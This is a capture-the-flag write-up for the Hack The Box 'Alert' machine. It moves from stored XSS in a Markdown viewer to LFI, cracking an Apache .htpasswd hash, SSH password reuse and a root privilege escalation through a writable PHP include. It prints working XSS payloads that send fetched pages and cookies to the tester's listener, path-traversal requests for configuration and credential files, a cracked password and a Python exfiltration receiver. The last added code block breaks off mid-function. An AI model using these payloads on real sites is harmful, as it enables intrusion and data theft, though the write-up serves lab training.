
Alert Writeup

  • 250424: Fixed typos and released this writeup to the public.

If you are not familiar with XSS, this box will feel hard.

Target Information

Machine Description
Name        Alert
OS          Linux
Difficulty  Easy
Author      FisMatHack

Recon

Service Scan

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/alert]
└─$ sudo nmap -p- -Pn --min-rate 6969 10.129.231.188
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 17:05 EST
Nmap scan report for 10.129.231.188
Host is up (0.085s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
12227/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 10.03 seconds

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/alert]
└─$ sudo nmap -p22,80,12227 -sCV -vv 10.129.231.188
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 17:05 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:05
Completed NSE at 17:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:05
Completed NSE at 17:05, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:05
Completed NSE at 17:05, 0.00s elapsed
Initiating Ping Scan at 17:05
Scanning 10.129.231.188 [4 ports]
Completed Ping Scan at 17:05, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:05
Completed Parallel DNS resolution of 1 host. at 17:05, 0.00s elapsed
Initiating SYN Stealth Scan at 17:05
Scanning 10.129.231.188 [3 ports]
Discovered open port 22/tcp on 10.129.231.188
Discovered open port 80/tcp on 10.129.231.188
Completed SYN Stealth Scan at 17:05, 1.60s elapsed (3 total ports)
Initiating Service scan at 17:05
Scanning 2 services on 10.129.231.188
Completed Service scan at 17:06, 6.21s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.231.188.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:06
Completed NSE at 17:06, 2.61s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:06
Completed NSE at 17:06, 0.35s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:06
Completed NSE at 17:06, 0.00s elapsed
Nmap scan report for 10.129.231.188
Host is up, received echo-reply ttl 63 (0.088s latency).
Scanned at 2024-12-04 17:05:55 EST for 11s

PORT      STATE    SERVICE REASON         VERSION
22/tcp    open     ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
| ssh-rsa ...
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHYLF+puo27gFRX69GBeZJqCeHN3ps2BScsUhKoDV66yEPMOo/Sn588F/wqBnJxsPB3KSFH+kbYW2M6erFI3U5k=
|   256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG/QUl3gapBOWCGEHplsOKe2NlWjlrb5vTTLjg6gMuGl
80/tcp    open     http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://alert.htb/
12227/tcp filtered unknown no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:06
Completed NSE at 17:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:06
Completed NSE at 17:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:06
Completed NSE at 17:06, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.12 seconds
           Raw packets sent: 8 (328B) | Rcvd: 3 (116B)

The scan shows three ports: SSH (22), HTTP (80) and a filtered 12227 that is of no further interest. The SSH banner identifies the host as Ubuntu, and the web server is Apache, which 301-redirects requests that arrive by bare IP to alert.htb (hence nmap's "Did not follow redirect"), so the domain goes into /etc/hosts.

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/alert]
└─$ echo "10.129.231.188 alert.htb" | sudo tee -a /etc/hosts
10.129.231.188 alert.htb

As for why the domain name has to be added to /etc/hosts, see the explanation in my other post.

HTTP - Port 80

The home page hosts a service that renders Markdown into HTML.

Before testing that feature I wanted a quick look at the other pages, and the "About Us" page states that the administrator replies to "Contact Us" messages within 24 hours.

An XSS attack that needs one more layer of wrapping

If the administrator really reads user-submitted messages, XSS or phishing becomes an option, so first submit an arbitrary email address and body to see what happens.

The submission succeeds, but as noted, sending plain text alone achieves nothing. The working assumption is that a bot (the "administrator") reads the messages. To confirm that a read actually happens, the message has to notify us the instant it is opened, and the simplest way to get that is XSS.

So the first probe is an HTML <img> in the body pointing at an image hosted on our machine. If the bot renders the HTML when it opens the message, the image is fetched and our HTTP server logs the request, and we can move on to a real XSS payload.

It worked! There is indeed a bot on the other side: the local HTTP server logs the image request coming from the target.

Testing XSS, and why it failed

Since someone really reads the messages, why not use XSS to steal their cookies?

It failed: the JavaScript in the onerror handler was never executed. Why?

Look at the HTTP server log:

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/alert]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.129.231.188 - - [08/Dec/2024 07:36:16] code 404, message File not found
10.129.231.188 - - [08/Dec/2024 07:36:16] "GET /QQ.png HTTP/1.1" 404 -
10.129.231.188 - - [08/Dec/2024 07:37:37] "GET /?c=%27+document.cookie> HTTP/1.1" 200 -

The log shows the whole tail of the JavaScript payload arriving as a URL path, which means the bot clicked a link rather than executing the handler: the XSS never fired.

In plain terms, the message we sent looked something like this to the bot:

<img src=x onerror=this.src='http://10.10.14.21:8000/?c='+document.cookie>

The leading <img> tag was not rendered as an image. The bot saw literal text (<img src=...) followed by a URL that the page auto-linked, clicked the link, and so we received GET /?c=%27+document.cookie> instead of a cookie.

Had the <img src=x ...> part of the message been rendered as HTML, the bot would have seen a broken image, like this:


⬆ Broken image, QQ

And the XSS would have fired the instant the page loaded, giving us /?c=<COOKIE> (with an empty <COOKIE> if no cookie is readable), not the URL-encoded leftovers of the payload text, /?c=%27+document.cookie> (%27 being the apostrophe).


So what now? Nothing to do here; look for other weaknesses first.

XSS in Markdown

Remember the feature on the home page? The site renders Markdown into HTML.

Many people do not realise that raw HTML fragments can be embedded in Markdown!

For example, this snippet (the button on the original page) is raw HTML written directly into the Markdown source:

<div style="text-align: center;"> <a class="md-button" href="javascript:alert$.next(&quot;%E7%9C%9F%E7%9A%84&quot;)">Really?</a> </div>

Besides HTML, CSS and JavaScript can be embedded as well, and if the viewer does nothing to sanitise the output, that is XSS.

Start with a test.md that, if the XSS fires, POSTs the HTML of the current page back to us:

# test
<script>
(function() {
  const htmlSource = document.documentElement.outerHTML;
  const xhr = new XMLHttpRequest();
  xhr.open('POST', 'http://10.10.14.31', true);
  xhr.send(htmlSource);
})();
</script>

Upload it.

Click "View Markdown" to open the rendered page.

Our listener receives the callback from the XSS we just triggered on ourselves, confirming that it works. In addition, the bottom right of the rendered page offers a link to that page, which is exactly what we can hand to the bot.

So restart nc, adjust the payload, and send the link, this time to fetch the target's home page as the bot sees it; there may be additional features.

Remember to use sudo when listening on port 80!

Linux treats ports 1-1023 as privileged; binding them requires root or the CAP_NET_BIND_SERVICE capability.

<script>
(function() {
  fetch('http://alert.htb', { mode: 'no-cors' })
    .then(response => response.text())
    .then(htmlSource => {
      const xhr = new XMLHttpRequest();
      xhr.open('POST', 'http://10.10.14.31', true);
      xhr.send(htmlSource);
    });
})();
</script>
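Every fetch above needs the nc listener restarted and port 80 re-bound as root. Here is an added receiver (my example, not part of the original writeup) that stays up, logs each hit and writes every POST body to its own file under loot/. The sample body in demo_store() is constructed; the address 10.129.93.216 is only used as a filename label.

```python
import datetime as dt
import tempfile
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from pathlib import Path


def store_body(body: bytes, dest_dir: Path, source: str) -> Path:
    """Write one exfiltrated body to its own timestamped file and return the path."""
    dest_dir.mkdir(parents=True, exist_ok=True)
    stamp = dt.datetime.now(dt.timezone.utc).strftime("%Y%m%dT%H%M%S.%f")
    path = dest_dir / f"{stamp}_{source.replace(':', '_')}.html"
    path.write_bytes(body)
    return path


class ExfilHandler(BaseHTTPRequestHandler):
    dest_dir = Path("loot")

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length)
        saved = store_body(body, self.dest_dir, self.client_address[0])
        self.log_message("saved %d bytes from %s to %s",
                         len(body), self.client_address[0], saved)
        # The bot's XHR never reads this response, so a bare 200 is enough;
        # no CORS headers are needed for the request itself to arrive.
        self.send_response(200)
        self.end_headers()

    def do_GET(self):
        # Still useful for the image-beacon probe used earlier on the page.
        self.log_message("GET %s", self.path)
        self.send_response(200)
        self.end_headers()


def demo_store() -> tuple:
    """Round-trip a constructed sample body through store_body (not real loot)."""
    sample = b"<!DOCTYPE html><html><title>Alert - Markdown Viewer</title></html>"
    with tempfile.TemporaryDirectory() as tmp:
        saved = store_body(sample, Path(tmp), "10.129.93.216")
        return saved.read_bytes(), saved.name


if __name__ == "__main__":
    # Port 80 is privileged: run as `sudo python3 exfil.py`
    ThreadingHTTPServer(("0.0.0.0", 80), ExfilHandler).serve_forever()
```

Each payload can then be fired repeatedly without touching the listener, and the saved files can be diffed to spot what the bot sees that we do not.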

By the way, I do not know why the cookie could not be stolen, which is why I switched to stealing the pages the bot sees instead.

Compared with an ordinary visitor, the bot (administrator) gets an extra "Messages" feature, so pull that page back too.

connect to [10.10.14.31] from (UNKNOWN) [10.129.93.216] 33870
POST / HTTP/1.1
Host: 10.10.14.31
Connection: keep-alive
Content-Length: 1012
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://alert.htb
Referer: http://alert.htb/
Accept-Encoding: gzip, deflate

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/style.css">
    <title>Alert - Markdown Viewer</title>
</head>
<body>
    <nav>
        <a href="index.php?page=alert">Markdown Viewer</a>
        <a href="index.php?page=contact">Contact Us</a>
        <a href="index.php?page=about">About Us</a>
        <a href="index.php?page=donate">Donate</a>
        <a href="index.php?page=messages">Messages</a>    </nav>
    <div class="container">
        <h1>Markdown Viewer</h1><div class="form-container">
            <form action="visualizer.php" method="post" enctype="multipart/form-data">
                <input type="file" name="file" accept=".md" required>
                <input type="submit" value="View Markdown">
            </form>
          </div>    </div>
    <footer>
        <p style="color: black;">© 2024 Alert. All rights reserved.</p>
    </footer>
</body>
</html>

Modify test.md again, upload it, restart nc, and send the link.

<script>
(function() {
  fetch('http://alert.htb/index.php?page=messages', { mode: 'no-cors' })
    .then(response => response.text())
    .then(htmlSource => {
      const xhr = new XMLHttpRequest();
      xhr.open('POST', 'http://10.10.14.31', true);
      xhr.send(htmlSource);
    });
})();
</script>

The "Messages" page exposes a file, 2024-03-10_15-48-34.txt, so repeat the same trick to fetch it.

connect to [10.10.14.31] from (UNKNOWN) [10.129.93.216] 45268
POST / HTTP/1.1
Host: 10.10.14.31
Connection: keep-alive
Content-Length: 821
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://alert.htb
Referer: http://alert.htb/
Accept-Encoding: gzip, deflate

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/style.css">
    <title>Alert - Markdown Viewer</title>
</head>
<body>
    <nav>
        <a href="index.php?page=alert">Markdown Viewer</a>
        <a href="index.php?page=contact">Contact Us</a>
        <a href="index.php?page=about">About Us</a>
        <a href="index.php?page=donate">Donate</a>
        <a href="index.php?page=messages">Messages</a>    </nav>
    <div class="container">
        <h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>
    </div>
    <footer>
        <p style="color: black;">© 2024 Alert. All rights reserved.</p>
    </footer>
</body>
</html>

I do not know why 2024-03-10_15-48-34.txt is empty, but it does not matter, because /messages.php?file=<FILE> is vulnerable to LFI.

XSS + LFI to read sensitive data

Testing confirms that /messages.php?file=<FILE> has an LFI (path traversal) flaw, and since the target runs Apache2, a quick web search gives the locations of its configuration files.

<script>
(function() {
  fetch('http://alert.htb/messages.php?file=../../../../../../../../etc/apache2/sites-enabled/000-default.conf', { mode: 'no-cors' })
    .then(response => response.text())
    .then(htmlSource => {
      const xhr = new XMLHttpRequest();
      xhr.open('POST', 'http://10.10.14.31', true);
      xhr.send(htmlSource);
    });
})();
</script>

Reading /etc/apache2/sites-enabled/000-default.conf for the vHost configuration reveals a second site, statistics.alert.htb, which also goes into /etc/hosts.

<VirtualHost *:80>
    ServerName alert.htb

    DocumentRoot /var/www/alert.htb

    <Directory /var/www/alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>

    RewriteEngine On
    RewriteCond %{HTTP_HOST} !^alert\.htb$
    RewriteCond %{HTTP_HOST} !^$
    RewriteRule ^/?(.*)$ http://alert.htb/$1 [R=301,L]

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

<VirtualHost *:80>
    ServerName statistics.alert.htb

    DocumentRoot /var/www/statistics.alert.htb

    <Directory /var/www/statistics.alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>

    <Directory /var/www/statistics.alert.htb>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        AuthType Basic
        AuthName "Restricted Area"
        AuthUserFile /var/www/statistics.alert.htb/.htpasswd
        Require valid-user
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>


Reading the configuration carefully, the AuthType Basic / AuthName / AuthUserFile / Require valid-user block shows that statistics.alert.htb requires authentication, with the credentials stored in /var/www/statistics.alert.htb/.htpasswd, so use the same technique to pull .htpasswd down.

albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
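To make the flaw behind messages.php?file=<FILE> concrete, here is an added Python model of the lookup (example code, not the target's PHP): the unsafe join that reproduces the traversal, next to the containment check that would have blocked it. The directory tree built in demo() is constructed for illustration; only the file names are borrowed from the page.

```python
import tempfile
from pathlib import Path


def resolve_unsafe(messages_dir: Path, requested: str) -> Path:
    """Mirror of the vulnerable pattern: the user-controlled name is joined
    onto the messages directory with no normalisation, so "../" walks out."""
    return messages_dir / requested


def resolve_safe(messages_dir: Path, requested: str) -> Path:
    """Hardened version: resolve symlinks and ".." first, then insist the
    result is still inside the messages directory. Checking the resolved
    path (not the raw string) also defeats encodings and symlink tricks
    that a blacklist of "../" would miss."""
    base = messages_dir.resolve()
    target = (base / requested).resolve()
    if not target.is_relative_to(base):
        raise PermissionError(f"path escapes messages dir: {requested!r}")
    if target == base or not target.is_file():
        raise FileNotFoundError(requested)
    return target


def demo() -> dict:
    """Build a throwaway tree (constructed sample, not the target's real
    files) and show how each resolver treats a traversal attempt."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        messages = root / "www" / "messages"
        messages.mkdir(parents=True)
        (messages / "2024-03-10_15-48-34.txt").write_text("")
        secret = root / "etc" / "apache2" / "000-default.conf"
        secret.parent.mkdir(parents=True)
        secret.write_text("ServerName statistics.alert.htb\n")

        traversal = "../../etc/apache2/000-default.conf"
        results = {
            "legit_ok": resolve_safe(messages, "2024-03-10_15-48-34.txt").name,
            # the unsafe join happily reads a file two levels up
            "unsafe_leaks": resolve_unsafe(messages, traversal).read_text(),
        }
        try:
            resolve_safe(messages, traversal)
            results["safe_blocked"] = False
        except PermissionError:
            results["safe_blocked"] = True
        return results


if __name__ == "__main__":
    print(demo())
```

The same containment check applies to any "file=" style parameter; the number of "../" segments the attacker needs is irrelevant once the resolved path is compared against the intended root.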

Brute-forcing the Apache MD5 hash

That yields albert's password hash, so run a dictionary attack on it with hashcat.

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/alert]
└─$ hashcat -h | grep apr1
   1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR)                      | FTP, HTTP, SMTP, LDAP Server

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/alert]
└─$ hashcat -a 0 -m 1600 albert.hash /usr/share/wordlists/rockyou-utf8.txt --username
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i9-13900H, 2917/5899 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou-utf8.txt
* Passwords.: 14344392
* Bytes.....: 140056880
* Keyspace..: 14344374
* Runtime...: 1 sec

$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/:manchesterunited

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1600 (Apache $apr1$ MD5, md5apr1, MD5 (APR))
Hash.Target......: $apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
Time.Started.....: Tue Dec 10 09:27:14 2024 (0 secs)
Time.Estimated...: Tue Dec 10 09:27:14 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou-utf8.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     6087 H/s (8.26ms) @ Accel:32 Loops:1000 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2816/14344374 (0.02%)
Rejected.........: 0/2816 (0.00%)
Restore.Point....: 2688/14344374 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1000
Candidate.Engine.: Device Generator
Candidates.#1....: my3kids -> medicina

Started: Tue Dec 10 09:26:48 2024
Stopped: Tue Dec 10 09:27:16 2024

The password cracks immediately.

albert:manchesterunited
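hashcat reports the plaintext but shows nothing of the scheme. As an added example (not from the original writeup), the following Python reimplements Apache's $apr1$ algorithm, which is md5crypt with a different magic string, and verifies the recovered credential offline; the only input is the .htpasswd line above.

```python
import hashlib
from typing import Iterable, Optional

_ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> bytes:
    """md5crypt's own base64: 6 bits at a time, least significant first."""
    out = bytearray()
    for _ in range(count):
        out.append(_ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def apr1_md5(password: bytes, salt: bytes) -> str:
    """Apache $apr1$: Poul-Henning Kamp's md5crypt with magic "$apr1$" in
    place of "$1$". 1000 rounds, salt of up to 8 chars, shuffled output."""
    magic = b"$apr1$"
    salt = salt[:8]

    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    # Mix in `alt` once per 16 bytes of password, plus the remainder.
    for remaining in range(len(password), 0, -16):
        ctx.update(alt[: min(16, remaining)])
    # For each bit of the password length, add a NUL or the first char.
    i = len(password)
    while i:
        ctx.update(b"\x00" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()

    # 1000 stretching rounds with a round-dependent ordering.
    for r in range(1000):
        ctx = hashlib.md5()
        ctx.update(password if r & 1 else final)
        if r % 3:
            ctx.update(salt)
        if r % 7:
            ctx.update(password)
        ctx.update(final if r & 1 else password)
        final = ctx.digest()

    encoded = (
        _to64((final[0] << 16) | (final[6] << 8) | final[12], 4)
        + _to64((final[1] << 16) | (final[7] << 8) | final[13], 4)
        + _to64((final[2] << 16) | (final[8] << 8) | final[14], 4)
        + _to64((final[3] << 16) | (final[9] << 8) | final[15], 4)
        + _to64((final[4] << 16) | (final[10] << 8) | final[5], 4)
        + _to64(final[11], 2)
    )
    return (magic + salt + b"$" + encoded).decode()


def verify_htpasswd(entry: str, candidate: str) -> bool:
    """Check one `user:$apr1$salt$hash` line against a candidate password."""
    _, hash_field = entry.split(":", 1)
    scheme, salt, _ = hash_field[1:].split("$")
    if scheme != "apr1":
        raise ValueError(f"unsupported scheme: {scheme}")
    return apr1_md5(candidate.encode(), salt.encode()) == hash_field


def crack(entry: str, wordlist: Iterable[str]) -> Optional[str]:
    """Tiny dictionary attack in the spirit of the hashcat -m 1600 run."""
    for word in wordlist:
        if verify_htpasswd(entry, word):
            return word
    return None


# The line recovered from .htpasswd on the target.
HTPASSWD_LINE = "albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/"

if __name__ == "__main__":
    print(crack(HTPASSWD_LINE, ["password", "123456", "manchesterunited"]))
```

Note that 1000 rounds of MD5 is the whole of the stretching; at the ~6 kH/s this CPU managed the scheme still falls to rockyou within seconds, which is why bcrypt (`htpasswd -B`) is the sane choice for .htpasswd files today.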

Try logging in.

The login to statistics.alert.htb succeeds.

There is nothing useful there, though.

SSH login as albert

With a password in hand, try it everywhere; thanks to password reuse it also works for SSH.

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/alert]
└─$ ssh albert@alert.htb
albert@alert.htb's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-200-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Tue 10 Dec 2024 03:11:14 PM UTC

  System load:           0.01
  Usage of /:            62.3% of 5.03GB
  Memory usage:          8%
  Swap usage:            0%
  Processes:             241
  Users logged in:       0
  IPv4 address for eth0: 10.129.93.216
  IPv6 address for eth0: dead:beef::250:56ff:feb9:88b8


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Nov 19 14:19:09 2024 from 10.10.14.23
albert@alert:/opt/website-monitor$ id
uid=1000(albert) gid=1000(albert) groups=1000(albert),1001(management)
albert@alert:~$ cat user.txt
38d7a78e76b2d5e68ff340673c6e9640

Internal Recon - Process Listing

Listing the running processes and filtering out the noise shows how the bot works: cron starts /root/scripts/xss_bot.sh, which uses inotifywait to watch /var/www/alert.htb/messages for newly created files and opens each one (the script itself is not worth quoting; it rather breaks the immersion). A second watcher, php_bot.sh, reacts to modifications under /opt/website-monitor/config.
What matters is /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor, running as root.

Terminal
albert@alert:~$ ps -ef
UID          PID    PPID  C STIME TTY          TIME CMD
...
root         976       1  0 13:28 ?        00:00:00 /usr/sbin/cron -f
root         985     976  0 13:28 ?        00:00:00 /usr/sbin/CRON -f
root         986     976  0 13:28 ?        00:00:00 /usr/sbin/CRON -f
root         991     985  0 13:28 ?        00:00:00 /bin/sh -c /root/scripts/php_bot.sh
root         992       1  0 13:28 ?        00:00:00 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor
root         993     986  0 13:28 ?        00:00:00 /bin/sh -c /root/scripts/xss_bot.sh
root         994     993  0 13:28 ?        00:00:00 /bin/bash /root/scripts/xss_bot.sh
root         997     994  0 13:28 ?        00:00:00 inotifywait -m -e create --format %w%f %e /var/www/alert.htb/messages --exclude 2024-03-10_15-48-34.txt
root         998     994  0 13:28 ?        00:00:00 /bin/bash /root/scripts/xss_bot.sh
root         999       1  0 13:28 ?        00:00:04 /usr/bin/python3 /usr/bin/fail2ban-server -xf start
daemon      1000       1  0 13:28 ?        00:00:00 /usr/sbin/atd -f
root        1001       1  0 13:28 ?        00:00:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root        1026       1  0 13:28 tty1     00:00:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root        1027     991  0 13:28 ?        00:00:00 /bin/bash /root/scripts/php_bot.sh
root        1028    1027  0 13:28 ?        00:00:00 inotifywait -m -e modify --format %w%f %e /opt/website-monitor/config
root        1029    1027  0 13:28 ?        00:00:00 /bin/bash /root/scripts/php_bot.sh
root        1030       1  0 13:28 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    1033    1030  0 13:28 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    1034    1030  0 13:28 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    1035    1030  0 13:28 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    1036    1030  0 13:28 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    1037    1030  0 13:28 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    1131    1030  0 13:31 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    1132    1030  0 13:31 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    1133    1030  0 13:31 ?        00:00:00 /usr/sbin/apache2 -k start
root        1479       2  0 13:39 ?        00:00:00 [kworker/0:0-events]
root        1693       2  0 13:44 ?        00:00:03 [kworker/1:0-events]
root        2971       2  0 14:34 ?        00:00:00 [kworker/u256:0-events_unbound]
root        3073       2  0 14:39 ?        00:00:00 [kworker/1:2-rcu_par_gp]
root        3280       2  0 15:05 ?        00:00:00 [kworker/u256:1-events_unbound]
root        3368       2  0 15:09 ?        00:00:00 [kworker/1:1-events]
root        3371       2  0 15:09 ?        00:00:00 [kworker/0:2-events]
root        3418    1001  0 15:11 ?        00:00:00 sshd: albert [priv]
albert      3439       1  0 15:11 ?        00:00:00 /lib/systemd/systemd --user
albert      3440    3439  0 15:11 ?        00:00:00 (sd-pam)
root        3446       2  0 15:11 ?        00:00:00 [kworker/0:3]
albert      3569    3418  0 15:11 ?        00:00:00 sshd: albert@pts/0
albert      3570    3569  0 15:11 pts/0    00:00:00 -bash
albert      3595    3570  0 15:12 pts/0    00:00:00 ps -ef

Tampering with a PHP file executed as root

With that lead, look at /opt/website-monitor to see what the PHP application loads.
The config directory is group-writable by management (albert belongs to that group, as the id output at login showed) and monitors is world-writable; config is the interesting one because it holds PHP, so look inside.

Terminal
albert@alert:~$ ls -alh /opt/website-monitor
total 96K
drwxrwxr-x 7 root root       4.0K Oct 12 01:07 .
drwxr-xr-x 4 root root       4.0K Oct 12 00:58 ..
drwxrwxr-x 2 root management 4.0K Oct 12 04:17 config
drwxrwxr-x 8 root root       4.0K Oct 12 00:58 .git
drwxrwxr-x 2 root root       4.0K Oct 12 00:58 incidents
-rwxrwxr-x 1 root root       5.2K Oct 12 01:00 index.php
-rwxrwxr-x 1 root root       1.1K Oct 12 00:58 LICENSE
-rwxrwxr-x 1 root root       1.5K Oct 12 01:00 monitor.php
drwxrwxrwx 2 root root       4.0K Oct 12 01:07 monitors
-rwxrwxr-x 1 root root        104 Oct 12 01:07 monitors.json
-rwxrwxr-x 1 root root        40K Oct 12 00:58 Parsedown.php
-rwxrwxr-x 1 root root       1.7K Oct 12 00:58 README.md
-rwxrwxr-x 1 root root       1.9K Oct 12 00:58 style.css
drwxrwxr-x 2 root root       4.0K Oct 12 00:58 updates
albert@alert:~$ cd /opt/websit*
albert@alert:/opt/website-monitor$ ll config/
total 12
drwxrwxr-x 2 root management 4096 Oct 12 04:17 ./
drwxrwxr-x 7 root root       4096 Oct 12 01:07 ../
-rwxrwxr-x 1 root management   49 Nov  5 14:31 configuration.php*

It contains a single file, configuration.php, and our permissions allow us to modify it.
It is included by index.php, and index.php is served by the PHP built-in server running as root, so appending a reverse shell to configuration.php and waiting for the callback is enough. Since that server is bound to 127.0.0.1:8080, a request to http://127.0.0.1:8080/ from the albert SSH session forces index.php, and with it configuration.php, to execute as root without waiting for the bot.

albert@alert:/opt/website-monitor$ cat index.php
<?php

include('config/configuration.php');
include(PATH.'/Parsedown.php');
...
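The precondition exploited here, a file the low-privileged user can modify being included by a script that root executes, is easy to audit for. This added Python helper (my example, not part of the writeup) pulls the include targets out of a PHP file and flags those the current user can write to. The tree in demo() is a constructed copy of the layout above; the body given to configuration.php is a guess used only for the demo.

```python
import os
import re
import tempfile
from pathlib import Path

# include/require(_once), with or without parentheses, up to the semicolon.
_INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*(.+?)\s*\)?\s*;")
# A bare single- or double-quoted string literal.
_LITERAL_RE = re.compile(r"""^(['"])(.+)\1$""")


def find_includes(php_source: str) -> dict:
    """Split include targets into string literals and expressions such as
    PATH.'/Parsedown.php', which need the constant's value to resolve and
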